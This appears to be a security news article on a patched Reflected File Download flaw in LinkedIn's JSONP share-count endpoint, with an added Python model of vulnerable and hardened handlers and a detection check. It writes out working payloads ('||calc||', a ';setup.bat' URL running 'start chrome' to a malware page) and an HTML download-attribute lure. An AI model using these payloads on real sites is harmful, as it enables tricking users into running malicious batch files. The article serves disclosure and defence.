A critical Reflected File Download (RFD) vulnerability in LinkedIn was discovered by security researcher David Sopas of WebSegura. He noticed the following XHR request in the browser's Inspector (developer tools) while browsing LinkedIn:
It is a simple request that websites make to count how many shares their site has on the LinkedIn network:
https://www.linkedin.com/countserv/count/share?url=http://www.site_i_was_in.pt
On trying a modified parameter in the request, as below,
https://www.linkedin.com/countserv/count/share?url="||calc||
the server returned the following response:
IN.Tags.Share.handleCount({"count":0,"fCnt":"0","fCntPlusOne":"1","url":"\"||calc||"});
Obviously the url parameter was not validated and was reflected into the JSONP body. The researcher saved the response, renamed it to .bat and ran it, and the Windows calculator started. This works because cmd.exe does not care about the JavaScript around the payload: the leading quote in the payload closes the quoted text before it, the text up to the first || is an invalid command that fails, and || then executes calc.
Because the endpoint tolerated a path parameter (a ;name.ext segment appended to the path), it was possible, just by changing the path, to have the browser save the response as a batch file and to run a different Windows command through the url parameter.
IE8 downloaded the batch file from linkedin.com automatically. Other browsers downloaded it through a link carrying the HTML5 download attribute, pointing at:
https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||
The proof-of-concept lure was an image linking to that URL (the original snippet was cut off; the closing tags are restored here):
<div align="center"><a href='https://www.linkedin.com/countserv/count/share;setup.bat?url="||start chrome websegura.net/malware.htm||' download="setup.bat" onclick="return false;"><img src="http://damnlink.com/uploaded_images/godaddy_coupons_and_godaddy_promo_code_3187745288.png" border="0" /></a></div>
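To make the two halves of the flaw concrete (the unvalidated reflection into the JSONP body and the client-chosen filename via a path parameter), here is an added example. It is not LinkedIn's code and not code from Sopas's write-up: it models a share-count endpoint in the vulnerable shape described above and in a hardened shape, and adds a small checker that flags a captured request/response pair as an RFD candidate. The handler names, the ENDPOINT constant, the exact validation rules and the sample inputs are constructed for illustration; only the callback name and the payloads are taken from the page.

```python
"""Added example, not code from LinkedIn or from Sopas's write-up: a small
model of a JSONP share-count endpoint in the vulnerable shape the article
describes and in a hardened shape, plus a checker that flags a captured
response as a Reflected File Download candidate. Handler names, the
parameter handling and the sample inputs are constructed for illustration."""
import json
import re
from urllib.parse import urlsplit

# Callback name taken from the response shown in the article.
CALLBACK = "IN.Tags.Share.handleCount"
ENDPOINT = "/countserv/count/share"   # assumed canonical path, no path parameters

# cmd.exe command separators: an attacker-controlled one of these inside a
# file that gets saved as .bat/.cmd is enough to chain a command.
CMD_SEPARATORS = re.compile(r"\|\||&&|[|&]")


def _jsonp(data):
    return CALLBACK + "(" + json.dumps(data, separators=(",", ":")) + ");"


def vulnerable_countserv(path, url):
    """The pattern described on the page: `url` is reflected unvalidated
    into the JSONP body, and the path may carry a ';setup.bat' parameter
    that the server ignores but the browser uses as the saved filename."""
    headers = {"Content-Type": "text/javascript"}
    return headers, _jsonp({"count": 0, "fCnt": "0", "fCntPlusOne": "1", "url": url})


def hardened_countserv(path, url):
    """Same endpoint with three controls: no path parameters, strict
    validation of the reflected value, and command separators rendered as
    JSON \\uXXXX escapes so the raw bytes of the body never contain them."""
    if path != ENDPOINT:                       # '/share;setup.bat' is rejected
        return {"Content-Type": "text/plain"}, "400 bad path"
    parts = urlsplit(url)
    if (parts.scheme not in ("http", "https") or not parts.netloc
            or not re.fullmatch(r"[\x21-\x7e]+", url)):   # printable ASCII, no spaces
        return {"Content-Type": "text/plain"}, "400 bad url"
    body = CMD_SEPARATORS.sub(
        lambda m: "".join("\\u%04x" % ord(c) for c in m.group(0)),
        _jsonp({"count": 0, "fCnt": "0", "fCntPlusOne": "1", "url": url}))
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, body


def decode_reflected_url(body):
    """Parse the JSONP wrapper back into the reflected url, i.e. what the
    legitimate JavaScript consumer sees after JSON decoding."""
    return json.loads(body[len(CALLBACK) + 1:-2])["url"]


def is_rfd_candidate(path, headers, body):
    """Assessor heuristic for a captured request/response pair: the client
    could choose the filename (path parameter present, no server-pinned
    Content-Disposition filename) and the body holds a cmd.exe separator."""
    client_named = ";" in path.rsplit("/", 1)[-1]
    server_named = "filename=" in headers.get("Content-Disposition", "")
    return client_named and not server_named and bool(CMD_SEPARATORS.search(body))


if __name__ == "__main__":
    # Constructed inputs modelled on the article's payloads.
    evil_path, evil_url = ENDPOINT + ";setup.bat", '"||calc||'
    h, b = vulnerable_countserv(evil_path, evil_url)
    print("vulnerable:", b, "-> RFD candidate:", is_rfd_candidate(evil_path, h, b))
    h, b = hardened_countserv(evil_path, evil_url)
    print("hardened, same request:", b)
    h, b = hardened_countserv(ENDPOINT, "http://example.com/?a=b||c")
    print("hardened, odd but valid url:", b, "-> RFD candidate:",
          is_rfd_candidate(ENDPOINT, h, b))
```

The escaping step is the part worth copying: a legitimate URL may contain `|` or `&`, and rejecting those outright would break real callers, but writing them as `\u007c` and `\u0026` keeps the JSON value identical for the JavaScript consumer while leaving cmd.exe nothing to split on. The nosniff header and the exact-path check close the remaining routes (content sniffing, and the ;filename trick) independently of the payload.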
Attack Scenario
· The malicious user sends the link to the victim, as with CSRF or XSS (phishing campaigns, social networks, instant messengers, posts, etc.)
· The victim clicks the link and, trusting where it comes from (LinkedIn), downloads the file
· The victim runs the file and his computer is hijacked
"A malicious user could even give more credibility to the HTML5 download site if he uses famous open redirection vulnerabilities on trusted sites like open redirects on Google or even on LinkedIn," wrote Sopas in a blog post.
RFD (Reflected File Download) is a serious flaw in which a malicious file is offered for download from a trusted website, in this case LinkedIn. Regardless of the file contents (virus, malware, Trojan, exploit, etc.), it is downloaded from the trusted domain and the user who runs it is compromised. Users should be extremely careful when downloading and executing files from the web. The download link might look perfectly fine, include a popular, trusted domain and use a secure connection, but users still need to be cautious not to get tricked. After Sopas reported this vulnerability, LinkedIn patched it.